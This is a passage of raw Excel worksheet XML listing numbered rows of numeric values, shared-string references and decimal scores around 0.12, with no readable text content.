      <c r="B30429" s="2">
        <v>1.4019728E7</v>
      </c>
      <c r="C30429" s="2" t="s">
        <v>29257</v>
      </c>
      <c r="D30429" s="2">
        <v>1.0</v>
      </c>
      <c r="E30429" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30429" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30430" ht="15.75" customHeight="1">
      <c r="A30430" s="1">
        <v>22082.0</v>
      </c>
      <c r="B30430" s="2">
        <v>3.0708876E7</v>
      </c>
      <c r="C30430" s="2" t="s">
        <v>29258</v>
      </c>
      <c r="D30430" s="2">
        <v>1.0</v>
      </c>
      <c r="E30430" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30430" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30431" ht="15.75" customHeight="1">
      <c r="A30431" s="1">
        <v>22553.0</v>
      </c>
      <c r="B30431" s="2">
        <v>3.8246201E7</v>
      </c>
      <c r="C30431" s="2" t="s">
        <v>29259</v>
      </c>
      <c r="D30431" s="2">
        <v>1.0</v>
      </c>
      <c r="E30431" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30431" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30432" ht="15.75" customHeight="1">
      <c r="A30432" s="1">
        <v>23027.0</v>
      </c>
      <c r="B30432" s="2">
        <v>4.9989327E7</v>
      </c>
      <c r="C30432" s="2" t="s">
        <v>29260</v>
      </c>
      <c r="D30432" s="2">
        <v>1.0</v>
      </c>
      <c r="E30432" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30432" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30433" ht="15.75" customHeight="1">
      <c r="A30433" s="1">
        <v>23325.0</v>
      </c>
      <c r="B30433" s="2">
        <v>5.4492792E7</v>
      </c>
      <c r="C30433" s="2" t="s">
        <v>29261</v>
      </c>
      <c r="D30433" s="2">
        <v>1.0</v>
      </c>
      <c r="E30433" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30433" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30434" ht="15.75" customHeight="1">
      <c r="A30434" s="1">
        <v>25679.0</v>
      </c>
      <c r="B30434" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C30434" s="2" t="s">
        <v>29262</v>
      </c>
      <c r="D30434" s="2">
        <v>1.0</v>
      </c>
      <c r="E30434" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30434" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30435" ht="15.75" customHeight="1">
      <c r="A30435" s="1">
        <v>26598.0</v>
      </c>
      <c r="B30435" s="2">
        <v>1.7984155E7</v>
      </c>
      <c r="C30435" s="2" t="s">
        <v>29263</v>
      </c>
      <c r="D30435" s="2">
        <v>1.0</v>
      </c>
      <c r="E30435" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30435" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30436" ht="15.75" customHeight="1">
      <c r="A30436" s="1">
        <v>29175.0</v>
      </c>
      <c r="B30436" s="2">
        <v>3.0708875E7</v>
      </c>
      <c r="C30436" s="2" t="s">
        <v>29258</v>
      </c>
      <c r="D30436" s="2">
        <v>1.0</v>
      </c>
      <c r="E30436" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30436" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30437" ht="15.75" customHeight="1">
      <c r="A30437" s="1">
        <v>29525.0</v>
      </c>
      <c r="B30437" s="2">
        <v>3.2789129E7</v>
      </c>
      <c r="C30437" s="2" t="s">
        <v>29264</v>
      </c>
      <c r="D30437" s="2">
        <v>1.0</v>
      </c>
      <c r="E30437" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30437" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30438" ht="15.75" customHeight="1">
      <c r="A30438" s="1">
        <v>30351.0</v>
      </c>
      <c r="B30438" s="2">
        <v>3.82462E7</v>
      </c>
      <c r="C30438" s="2" t="s">
        <v>29265</v>
      </c>
      <c r="D30438" s="2">
        <v>1.0</v>
      </c>
      <c r="E30438" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30438" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30439" ht="15.75" customHeight="1">
      <c r="A30439" s="1">
        <v>30919.0</v>
      </c>
      <c r="B30439" s="2">
        <v>4.6837869E7</v>
      </c>
      <c r="C30439" s="2" t="s">
        <v>29266</v>
      </c>
      <c r="D30439" s="2">
        <v>1.0</v>
      </c>
      <c r="E30439" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30439" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30440" ht="15.75" customHeight="1">
      <c r="A30440" s="1">
        <v>33529.0</v>
      </c>
      <c r="B30440" s="2">
        <v>8122434.0</v>
      </c>
      <c r="C30440" s="2" t="s">
        <v>29267</v>
      </c>
      <c r="D30440" s="2">
        <v>1.0</v>
      </c>
      <c r="E30440" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30440" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30441" ht="15.75" customHeight="1">
      <c r="A30441" s="1">
        <v>6804.0</v>
      </c>
      <c r="B30441" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C30441" s="2" t="s">
        <v>29268</v>
      </c>
      <c r="D30441" s="2">
        <v>1.0</v>
      </c>
      <c r="E30441" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30441" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="30442" ht="15.75" customHeight="1">
      <c r="A30442" s="1">
        <v>20011.0</v>
      </c>
      <c r="B30442" s="2">
        <v>5.7739694E7</v>
      </c>
      <c r="C30442" s="2" t="s">
        <v>29269</v>
      </c>
      <c r="D30442" s="2">
        <v>1.0</v>
      </c>
      <c r="E30442" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30442" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="30443" ht="15.75" customHeight="1">
      <c r="A30443" s="1">
        <v>25254.0</v>
      </c>
      <c r="B30443" s="2">
        <v>1.3382816E7</v>
      </c>
      <c r="C30443" s="2" t="s">
        <v>29270</v>
      </c>
      <c r="D30443" s="2">
        <v>1.0</v>
      </c>
      <c r="E30443" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30443" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="30444" ht="15.75" customHeight="1">
      <c r="A30444" s="1">
        <v>25304.0</v>
      </c>
      <c r="B30444" s="2">
        <v>1.3416788E7</v>
      </c>
      <c r="C30444" s="2" t="s">
        <v>29271</v>
      </c>
      <c r="D30444" s="2">
        <v>1.0</v>
      </c>
      <c r="E30444" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30444" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="30445" ht="15.75" customHeight="1">
      <c r="A30445" s="1">
        <v>27892.0</v>
      </c>
      <c r="B30445" s="2">
        <v>2.3648795E7</v>
      </c>
      <c r="C30445" s="2" t="s">
        <v>29272</v>
      </c>
      <c r="D30445" s="2">
        <v>1.0</v>
      </c>
      <c r="E30445" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30445" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="30446" ht="15.75" customHeight="1">
      <c r="A30446" s="1">
        <v>29005.0</v>
      </c>
      <c r="B30446" s="2">
        <v>2.9929435E7</v>
      </c>
      <c r="C30446" s="2" t="s">
        <v>29272</v>
      </c>
      <c r="D30446" s="2">
        <v>1.0</v>
      </c>
      <c r="E30446" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30446" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="30447" ht="15.75" customHeight="1">
      <c r="A30447" s="1">
        <v>9037.0</v>
      </c>
      <c r="B30447" s="2">
        <v>5.5046885E7</v>
      </c>
      <c r="C30447" s="2" t="s">
        <v>29273</v>
      </c>
      <c r="D30447" s="2">
        <v>1.0</v>
      </c>
      <c r="E30447" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30447" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="30448" ht="15.75" customHeight="1">
      <c r="A30448" s="1">
        <v>17107.0</v>
      </c>
      <c r="B30448" s="2">
        <v>4.8698224E7</v>
      </c>
      <c r="C30448" s="2" t="s">
        <v>29274</v>
      </c>
      <c r="D30448" s="2">
        <v>1.0</v>
      </c>
      <c r="E30448" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30448" s="2">
        <v>0.1205450733752621</v>
      </c>
    </row>
    <row r="30449" ht="15.75" customHeight="1">
      <c r="A30449" s="1">
        <v>2793.0</v>
      </c>
      <c r="B30449" s="2">
        <v>3.5259688E7</v>
      </c>
      <c r="C30449" s="2" t="s">
        <v>29275</v>
      </c>
      <c r="D30449" s="2">
        <v>1.0</v>
      </c>
      <c r="E30449" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30449" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="30450" ht="15.75" customHeight="1">
      <c r="A30450" s="1">
        <v>5686.0</v>
      </c>
      <c r="B30450" s="2">
        <v>4.6424229E7</v>
      </c>
      <c r="C30450" s="2" t="s">
        <v>29276</v>
      </c>
      <c r="D30450" s="2">
        <v>1.0</v>
      </c>
      <c r="E30450" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30450" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="30451" ht="15.75" customHeight="1">
      <c r="A30451" s="1">
        <v>29018.0</v>
      </c>
      <c r="B30451" s="2">
        <v>3.0085585E7</v>
      </c>
      <c r="C30451" s="2" t="s">
        <v>29277</v>
      </c>
      <c r="D30451" s="2">
        <v>1.0</v>
      </c>
      <c r="E30451" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30451" s="2">
        <v>0.1205128205128205</v>
      </c>
    </row>
    <row r="30452" ht="15.75" customHeight="1">
      <c r="A30452" s="1">
        <v>27549.0</v>
      </c>
      <c r="B30452" s="2">
        <v>2.2335486E7</v>
      </c>
      <c r="C30452" s="2" t="s">
        <v>29278</v>
      </c>
      <c r="D30452" s="2">
        <v>1.0</v>
      </c>
      <c r="E30452" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30452" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="30453" ht="15.75" customHeight="1">
      <c r="A30453" s="1">
        <v>4128.0</v>
      </c>
      <c r="B30453" s="2">
        <v>4.1382224E7</v>
      </c>
      <c r="C30453" s="2" t="s">
        <v>29279</v>
      </c>
      <c r="D30453" s="2">
        <v>1.0</v>
      </c>
      <c r="E30453" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30453" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="30454" ht="15.75" customHeight="1">
      <c r="A30454" s="1">
        <v>11254.0</v>
      </c>
      <c r="B30454" s="2">
        <v>2.0549649E7</v>
      </c>
      <c r="C30454" s="2" t="s">
        <v>29280</v>
      </c>
      <c r="D30454" s="2">
        <v>1.0</v>
      </c>
      <c r="E30454" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30454" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="30455" ht="15.75" customHeight="1">
      <c r="A30455" s="1">
        <v>11544.0</v>
      </c>
      <c r="B30455" s="2">
        <v>2.2646498E7</v>
      </c>
      <c r="C30455" s="2" t="s">
        <v>29281</v>
      </c>
      <c r="D30455" s="2">
        <v>1.0</v>
      </c>
      <c r="E30455" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30455" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="30456" ht="15.75" customHeight="1">
      <c r="A30456" s="1">
        <v>16834.0</v>
      </c>
      <c r="B30456" s="2">
        <v>4.7895873E7</v>
      </c>
      <c r="C30456" s="2" t="s">
        <v>29282</v>
      </c>
      <c r="D30456" s="2">
        <v>1.0</v>
      </c>
      <c r="E30456" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30456" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="30457" ht="15.75" customHeight="1">
      <c r="A30457" s="1">
        <v>17084.0</v>
      </c>
      <c r="B30457" s="2">
        <v>4.8617982E7</v>
      </c>
      <c r="C30457" s="2" t="s">
        <v>29283</v>
      </c>
      <c r="D30457" s="2">
        <v>1.0</v>
      </c>
      <c r="E30457" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30457" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="30458" ht="15.75" customHeight="1">
      <c r="A30458" s="1">
        <v>12359.0</v>
      </c>
      <c r="B30458" s="2">
        <v>2.8692584E7</v>
      </c>
      <c r="C30458" s="2" t="s">
        <v>29284</v>
      </c>
      <c r="D30458" s="2">
        <v>1.0</v>
      </c>
      <c r="E30458" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30458" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="30459" ht="15.75" customHeight="1">
      <c r="A30459" s="1">
        <v>13338.0</v>
      </c>
      <c r="B30459" s="2">
        <v>3.4690743E7</v>
      </c>
      <c r="C30459" s="2" t="s">
        <v>29285</v>
      </c>
      <c r="D30459" s="2">
        <v>1.0</v>
      </c>
      <c r="E30459" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30459" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="30460" ht="15.75" customHeight="1">
      <c r="A30460" s="1">
        <v>21264.0</v>
      </c>
      <c r="B30460" s="2">
        <v>2.0045604E7</v>
      </c>
      <c r="C30460" s="2" t="s">
        <v>29286</v>
      </c>
      <c r="D30460" s="2">
        <v>1.0</v>
      </c>
      <c r="E30460" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30460" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="30461" ht="15.75" customHeight="1">
      <c r="A30461" s="1">
        <v>21204.0</v>
      </c>
      <c r="B30461" s="2">
        <v>1.9521257E7</v>
      </c>
      <c r="C30461" s="2" t="s">
        <v>29287</v>
      </c>
      <c r="D30461" s="2">
        <v>1.0</v>
      </c>
      <c r="E30461" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30461" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="30462" ht="15.75" customHeight="1">
      <c r="A30462" s="1">
        <v>26501.0</v>
      </c>
      <c r="B30462" s="2">
        <v>1.7540851E7</v>
      </c>
      <c r="C30462" s="2" t="s">
        <v>29288</v>
      </c>
      <c r="D30462" s="2">
        <v>1.0</v>
      </c>
      <c r="E30462" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30462" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="30463" ht="15.75" customHeight="1">
      <c r="A30463" s="1">
        <v>17968.0</v>
      </c>
      <c r="B30463" s="2">
        <v>5.1353516E7</v>
      </c>
      <c r="C30463" s="2" t="s">
        <v>29289</v>
      </c>
      <c r="D30463" s="2">
        <v>1.0</v>
      </c>
      <c r="E30463" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30463" s="2">
        <v>0.1198412698412699</v>
      </c>
    </row>
    <row r="30464" ht="15.75" customHeight="1">
      <c r="A30464" s="1">
        <v>124.0</v>
      </c>
      <c r="B30464" s="2">
        <v>1.3122958E7</v>
      </c>
      <c r="C30464" s="2" t="s">
        <v>29290</v>
      </c>
      <c r="D30464" s="2">
        <v>1.0</v>
      </c>
      <c r="E30464" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30464" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="30465" ht="15.75" customHeight="1">
      <c r="A30465" s="1">
        <v>10815.0</v>
      </c>
      <c r="B30465" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C30465" s="2" t="s">
        <v>29291</v>
      </c>
      <c r="D30465" s="2">
        <v>1.0</v>
      </c>
      <c r="E30465" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30465" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="30466" ht="15.75" customHeight="1">
      <c r="A30466" s="1">
        <v>17145.0</v>
      </c>
      <c r="B30466" s="2">
        <v>4.8839943E7</v>
      </c>
      <c r="C30466" s="2" t="s">
        <v>29292</v>
      </c>
      <c r="D30466" s="2">
        <v>1.0</v>
      </c>
      <c r="E30466" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30466" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="30467" ht="15.75" customHeight="1">
      <c r="A30467" s="1">
        <v>18163.0</v>
      </c>
      <c r="B30467" s="2">
        <v>5.191763E7</v>
      </c>
      <c r="C30467" s="2" t="s">
        <v>29293</v>
      </c>
      <c r="D30467" s="2">
        <v>1.0</v>
      </c>
      <c r="E30467" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30467" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="30468" ht="15.75" customHeight="1">
      <c r="A30468" s="1">
        <v>27400.0</v>
      </c>
      <c r="B30468" s="2">
        <v>2.1801293E7</v>
      </c>
      <c r="C30468" s="2" t="s">
        <v>29294</v>
      </c>
      <c r="D30468" s="2">
        <v>1.0</v>
      </c>
      <c r="E30468" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30468" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="30469" ht="15.75" customHeight="1">
      <c r="A30469" s="1">
        <v>34253.0</v>
      </c>
      <c r="B30469" s="2">
        <v>4.9250457E7</v>
      </c>
      <c r="C30469" s="2" t="s">
        <v>29295</v>
      </c>
      <c r="D30469" s="2">
        <v>1.0</v>
      </c>
      <c r="E30469" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30469" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="30470" ht="15.75" customHeight="1">
      <c r="A30470" s="1">
        <v>12884.0</v>
      </c>
      <c r="B30470" s="2">
        <v>3.2011788E7</v>
      </c>
      <c r="C30470" s="2" t="s">
        <v>29296</v>
      </c>
      <c r="D30470" s="2">
        <v>1.0</v>
      </c>
      <c r="E30470" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30470" s="2">
        <v>0.1195987654320988</v>
      </c>
    </row>
    <row r="30471" ht="15.75" customHeight="1">
      <c r="A30471" s="1">
        <v>18295.0</v>
      </c>
      <c r="B30471" s="2">
        <v>5.2304308E7</v>
      </c>
      <c r="C30471" s="2" t="s">
        <v>29297</v>
      </c>
      <c r="D30471" s="2">
        <v>1.0</v>
      </c>
      <c r="E30471" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30471" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="30472" ht="15.75" customHeight="1">
      <c r="A30472" s="1">
        <v>3845.0</v>
      </c>
      <c r="B30472" s="2">
        <v>4.0244994E7</v>
      </c>
      <c r="C30472" s="2" t="s">
        <v>29298</v>
      </c>
      <c r="D30472" s="2">
        <v>1.0</v>
      </c>
      <c r="E30472" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30472" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30473" ht="15.75" customHeight="1">
      <c r="A30473" s="1">
        <v>7747.0</v>
      </c>
      <c r="B30473" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C30473" s="2" t="s">
        <v>29299</v>
      </c>
      <c r="D30473" s="2">
        <v>1.0</v>
      </c>
      <c r="E30473" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30473" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30474" ht="15.75" customHeight="1">
      <c r="A30474" s="1">
        <v>10130.0</v>
      </c>
      <c r="B30474" s="2">
        <v>5.7291192E7</v>
      </c>
      <c r="C30474" s="2" t="s">
        <v>29300</v>
      </c>
      <c r="D30474" s="2">
        <v>1.0</v>
      </c>
      <c r="E30474" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30474" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30475" ht="15.75" customHeight="1">
      <c r="A30475" s="1">
        <v>16657.0</v>
      </c>
      <c r="B30475" s="2">
        <v>4.7207711E7</v>
      </c>
      <c r="C30475" s="2" t="s">
        <v>29301</v>
      </c>
      <c r="D30475" s="2">
        <v>1.0</v>
      </c>
      <c r="E30475" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30475" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30476" ht="15.75" customHeight="1">
      <c r="A30476" s="1">
        <v>16696.0</v>
      </c>
      <c r="B30476" s="2">
        <v>4.7378726E7</v>
      </c>
      <c r="C30476" s="2" t="s">
        <v>29302</v>
      </c>
      <c r="D30476" s="2">
        <v>1.0</v>
      </c>
      <c r="E30476" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30476" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30477" ht="15.75" customHeight="1">
      <c r="A30477" s="1">
        <v>21276.0</v>
      </c>
      <c r="B30477" s="2">
        <v>2.0233406E7</v>
      </c>
      <c r="C30477" s="2" t="s">
        <v>29303</v>
      </c>
      <c r="D30477" s="2">
        <v>1.0</v>
      </c>
      <c r="E30477" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30477" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30478" ht="15.75" customHeight="1">
      <c r="A30478" s="1">
        <v>26148.0</v>
      </c>
      <c r="B30478" s="2">
        <v>1.6062442E7</v>
      </c>
      <c r="C30478" s="2" t="s">
        <v>29304</v>
      </c>
      <c r="D30478" s="2">
        <v>1.0</v>
      </c>
      <c r="E30478" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30478" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30479" ht="15.75" customHeight="1">
      <c r="A30479" s="1">
        <v>32316.0</v>
      </c>
      <c r="B30479" s="2">
        <v>5.5738857E7</v>
      </c>
      <c r="C30479" s="2" t="s">
        <v>29305</v>
      </c>
      <c r="D30479" s="2">
        <v>1.0</v>
      </c>
      <c r="E30479" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30479" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="30480" ht="15.75" customHeight="1">
      <c r="A30480" s="1">
        <v>1417.0</v>
      </c>
      <c r="B30480" s="2">
        <v>2.6514618E7</v>
      </c>
      <c r="C30480" s="2" t="s">
        <v>29306</v>
      </c>
      <c r="D30480" s="2">
        <v>1.0</v>
      </c>
      <c r="E30480" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30480" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30481" ht="15.75" customHeight="1">
      <c r="A30481" s="1">
        <v>9219.0</v>
      </c>
      <c r="B30481" s="2">
        <v>5.5430612E7</v>
      </c>
      <c r="C30481" s="2" t="s">
        <v>29307</v>
      </c>
      <c r="D30481" s="2">
        <v>1.0</v>
      </c>
      <c r="E30481" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30481" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30482" ht="15.75" customHeight="1">
      <c r="A30482" s="1">
        <v>10619.0</v>
      </c>
      <c r="B30482" s="2">
        <v>1.3757499E7</v>
      </c>
      <c r="C30482" s="2" t="s">
        <v>29308</v>
      </c>
      <c r="D30482" s="2">
        <v>1.0</v>
      </c>
      <c r="E30482" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30482" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30483" ht="15.75" customHeight="1">
      <c r="A30483" s="1">
        <v>13492.0</v>
      </c>
      <c r="B30483" s="2">
        <v>3.5394762E7</v>
      </c>
      <c r="C30483" s="2" t="s">
        <v>29309</v>
      </c>
      <c r="D30483" s="2">
        <v>1.0</v>
      </c>
      <c r="E30483" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30483" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30484" ht="15.75" customHeight="1">
      <c r="A30484" s="1">
        <v>13838.0</v>
      </c>
      <c r="B30484" s="2">
        <v>3.6780872E7</v>
      </c>
      <c r="C30484" s="2" t="s">
        <v>29310</v>
      </c>
      <c r="D30484" s="2">
        <v>1.0</v>
      </c>
      <c r="E30484" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30484" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30485" ht="15.75" customHeight="1">
      <c r="A30485" s="1">
        <v>16165.0</v>
      </c>
      <c r="B30485" s="2">
        <v>4.5619667E7</v>
      </c>
      <c r="C30485" s="2" t="s">
        <v>29311</v>
      </c>
      <c r="D30485" s="2">
        <v>1.0</v>
      </c>
      <c r="E30485" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30485" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30486" ht="15.75" customHeight="1">
      <c r="A30486" s="1">
        <v>26311.0</v>
      </c>
      <c r="B30486" s="2">
        <v>1.6648597E7</v>
      </c>
      <c r="C30486" s="2" t="s">
        <v>29312</v>
      </c>
      <c r="D30486" s="2">
        <v>1.0</v>
      </c>
      <c r="E30486" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30486" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30487" ht="15.75" customHeight="1">
      <c r="A30487" s="1">
        <v>31780.0</v>
      </c>
      <c r="B30487" s="2">
        <v>5225181.0</v>
      </c>
      <c r="C30487" s="2" t="s">
        <v>29313</v>
      </c>
      <c r="D30487" s="2">
        <v>1.0</v>
      </c>
      <c r="E30487" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30487" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30488" ht="15.75" customHeight="1">
      <c r="A30488" s="1">
        <v>32199.0</v>
      </c>
      <c r="B30488" s="2">
        <v>5477011.0</v>
      </c>
      <c r="C30488" s="2" t="s">
        <v>29314</v>
      </c>
      <c r="D30488" s="2">
        <v>1.0</v>
      </c>
      <c r="E30488" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30488" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30489" ht="15.75" customHeight="1">
      <c r="A30489" s="1">
        <v>33628.0</v>
      </c>
      <c r="B30489" s="2">
        <v>8356081.0</v>
      </c>
      <c r="C30489" s="2" t="s">
        <v>29315</v>
      </c>
      <c r="D30489" s="2">
        <v>1.0</v>
      </c>
      <c r="E30489" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30489" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="30490" ht="15.75" customHeight="1">
      <c r="A30490" s="1">
        <v>549.0</v>
      </c>
      <c r="B30490" s="2">
        <v>1.8752499E7</v>
      </c>
      <c r="C30490" s="2" t="s">
        <v>29316</v>
      </c>
      <c r="D30490" s="2">
        <v>1.0</v>
      </c>
      <c r="E30490" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30490" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30491" ht="15.75" customHeight="1">
      <c r="A30491" s="1">
        <v>1716.0</v>
      </c>
      <c r="B30491" s="2">
        <v>2.8610677E7</v>
      </c>
      <c r="C30491" s="2" t="s">
        <v>29317</v>
      </c>
      <c r="D30491" s="2">
        <v>1.0</v>
      </c>
      <c r="E30491" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30491" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30492" ht="15.75" customHeight="1">
      <c r="A30492" s="1">
        <v>6774.0</v>
      </c>
      <c r="B30492" s="2">
        <v>4.9436848E7</v>
      </c>
      <c r="C30492" s="2" t="s">
        <v>29318</v>
      </c>
      <c r="D30492" s="2">
        <v>1.0</v>
      </c>
      <c r="E30492" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30492" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30493" ht="15.75" customHeight="1">
      <c r="A30493" s="1">
        <v>11117.0</v>
      </c>
      <c r="B30493" s="2">
        <v>1.8934943E7</v>
      </c>
      <c r="C30493" s="2" t="s">
        <v>29319</v>
      </c>
      <c r="D30493" s="2">
        <v>1.0</v>
      </c>
      <c r="E30493" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30493" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30494" ht="15.75" customHeight="1">
      <c r="A30494" s="1">
        <v>11868.0</v>
      </c>
      <c r="B30494" s="2">
        <v>2.4910611E7</v>
      </c>
      <c r="C30494" s="2" t="s">
        <v>29320</v>
      </c>
      <c r="D30494" s="2">
        <v>1.0</v>
      </c>
      <c r="E30494" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30494" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30495" ht="15.75" customHeight="1">
      <c r="A30495" s="1">
        <v>14649.0</v>
      </c>
      <c r="B30495" s="2">
        <v>4.0377382E7</v>
      </c>
      <c r="C30495" s="2" t="s">
        <v>29321</v>
      </c>
      <c r="D30495" s="2">
        <v>1.0</v>
      </c>
      <c r="E30495" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30495" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30496" ht="15.75" customHeight="1">
      <c r="A30496" s="1">
        <v>14880.0</v>
      </c>
